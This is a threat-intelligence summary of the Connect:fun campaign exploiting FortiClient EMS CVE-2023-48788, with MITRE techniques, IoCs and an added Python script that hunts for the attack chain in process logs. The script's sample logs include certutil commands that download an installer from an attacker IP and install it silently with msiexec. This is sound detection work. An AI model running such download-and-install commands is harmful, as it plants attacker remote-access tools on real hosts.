The Connect:fun campaign exploits Fortinet FortiClient EMS CVE-2023-48788 to deliver post-exploitation tools such as ScreenConnect and Powerfun, targeting a media company and possibly other VPN appliance deployments. The operation shows a non-automated, targeted pattern with infrastructure tied to Vietnamese and German language usage, has been active since at least 2022, and the observed activity includes logged download and execution attempts. #ConnectFun #FortiClientEMS #ScreenConnect #Powerfun #CVE-2023-48788 #Fortinet
Keypoints
- Campaign name Connect:fun is tied to the use of ScreenConnect and Powerfun as post-exploitation tools.
- Exploitation centers on CVE-2023-48788 (FortiClient EMS SQL injection) with observed exploitation attempts since March 2024.
- Attack sequence includes enabling xp_cmdshell via SQL Server and downloading/installing ScreenConnect using certutil and msiexec.
- Payloads were downloaded from the actor’s infrastructure, including a Powerfun-based script providing bind/reverse shells and C2 command handling.
- Campaign shows targeting behavior (manual, non-automated probing) and infrastructure using Vietnamese/German language signals; IPs/domains overlap with prior incidents.
- Mitigation emphasizes patching, IDS monitoring, WAF usage, and the published IoCs/TTPs for detection and hunting.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – FortiClient EMS CVE-2023-48788 exploited via SQL injection to gain access. Quote: “a SQL injection vulnerability in the FortiClient EMS security management solution.”
- [T1059.003] Windows Command Shell – Commands to enable advanced configuration options and the xp_cmdshell stored procedure in SQL Server were used. Quote: “sequence of commands to enable advanced configuration options and the xp_cmdshell stored procedure in SQL Server.”
- [T1219] Remote Services – Post-exploitation use of the ScreenConnect remote management tool to control the compromised host. Quote: “download ScreenConnect remote management tool”
- [T1105] Ingress Tool Transfer – certutil.exe downloaded ScreenConnect and a malicious payload; payloads downloaded from external IPs. Quote: “certutil.exe to download ScreenConnect and install it using msiexec.exe.” and “download a malicious payload from 185[.]56[.]83[.]82”
- [T1027] Obfuscated/Compressed Files and Information – Obfuscated commands used in SQL injections during the campaign. Quote: “obfuscated commands”
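The technique chain above (SQL Server spawning cmd.exe via xp_cmdshell, certutil fetching an installer, msiexec installing it) is what a hunter would correlate per host. The following is an added example, not code from the Forescout post: it runs simple rules and the post's IP indicators over constructed process-creation telemetry in an assumed four-field format (timestamp host parent_image command_line) and rates a host "high" when the full chain appears within one time window.

```python
# Added example (not from the Forescout post). Log format below is constructed
# for this demo; map your Sysmon/4688/EDR fields onto it before use.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry; 185.56.83.82 is an IoC quoted in the post.
SAMPLE_LOGS = """\
2024-03-22T10:01:05Z ems01 sqlservr.exe cmd.exe /c "certutil -urlcache -split -f hxxp://185.56.83.82/sc.msi C:\\Windows\\Temp\\sc.msi"
2024-03-22T10:01:09Z ems01 sqlservr.exe cmd.exe /c "msiexec /i C:\\Windows\\Temp\\sc.msi /quiet"
2024-03-22T10:03:40Z ws07 explorer.exe certutil -hashfile C:\\Users\\a\\setup.exe SHA256
2024-03-22T10:20:12Z ems02 sqlservr.exe cmd.exe /c whoami
"""
# IP indicators taken from the post (defanged there; plain here for matching).
IOC_IPS = {"141.136.43.188", "144.202.21.16", "185.56.83.82", "95.179.241.10"}

RULES = {  # T1059.003 via xp_cmdshell, T1105 via certutil, ScreenConnect install
    "sql_to_cmd": lambda parent, cmd: parent == "sqlservr.exe" and cmd.lower().startswith("cmd.exe"),
    "certutil_download": lambda parent, cmd: re.search(r"certutil(\.exe)?\s.*-urlcache", cmd, re.I) is not None,
    "msiexec_install": lambda parent, cmd: re.search(r"msiexec(\.exe)?\s.*/i\s", cmd, re.I) is not None,
}
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (.*)$")

def parse_line(line):
    # Returns (timestamp, host, parent_image, command_line) or None if unparseable.
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, host, parent, cmd = m.groups()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, parent, cmd

def analyze(log_text, window=timedelta(minutes=10)):
    # Collect rule and IoC hits per host, then correlate those inside `window`
    # of the host's first hit; the complete chain on one host is rated high.
    per_host = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, host, parent, cmd = rec
        hits = {name for name, fn in RULES.items() if fn(parent, cmd)}
        iocs = {ip for ip in IOC_IPS if ip in cmd}
        if hits or iocs:
            per_host[host].append((ts, hits, iocs))
    alerts = {}
    for host, events in per_host.items():
        start = min(e[0] for e in events)
        in_window = [e for e in events if e[0] - start <= window]
        techniques = set().union(*(e[1] for e in in_window))
        matched = set().union(*(e[2] for e in in_window))
        alerts[host] = {"techniques": techniques, "iocs": matched,
                        "severity": "high" if set(RULES) <= techniques else "medium"}
    return alerts
```

A host with only one stage (here ems02, where SQL Server spawned cmd.exe for a lone `whoami`) still surfaces as a medium alert, which matches the manual probing the post describes.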
Indicators of Compromise
- [IP addresses] Seen in our incident: 141[.]136[.]43[.]188, 2a02:4780:a:952:0:1e10:e79b:1, 144[.]202[.]21[.]16. Seen in other incidents: 185[.]56[.]83[.]82, 95[.]179[.]241[.]10.
- [URLs / Domains] Seen in our incident: mci11[.]raow[.]fun. Seen in other incidents: hxxp[:]//45.227.255[.]213:20201, hxxp[:]//68[.]178[.]202[.]116, jxqmwbgxygkyftpxykdk8cfkq1hy371pz.oast[.]fun.
- [Hostnames] “VULTR-GUEST”
- [Domains] ursketz[.]com, ls[.]vfxtraining[.]shop
Read more: https://www.forescout.com/blog/connectfun-new-exploit-campaign-in-the-wild-targets-media-company/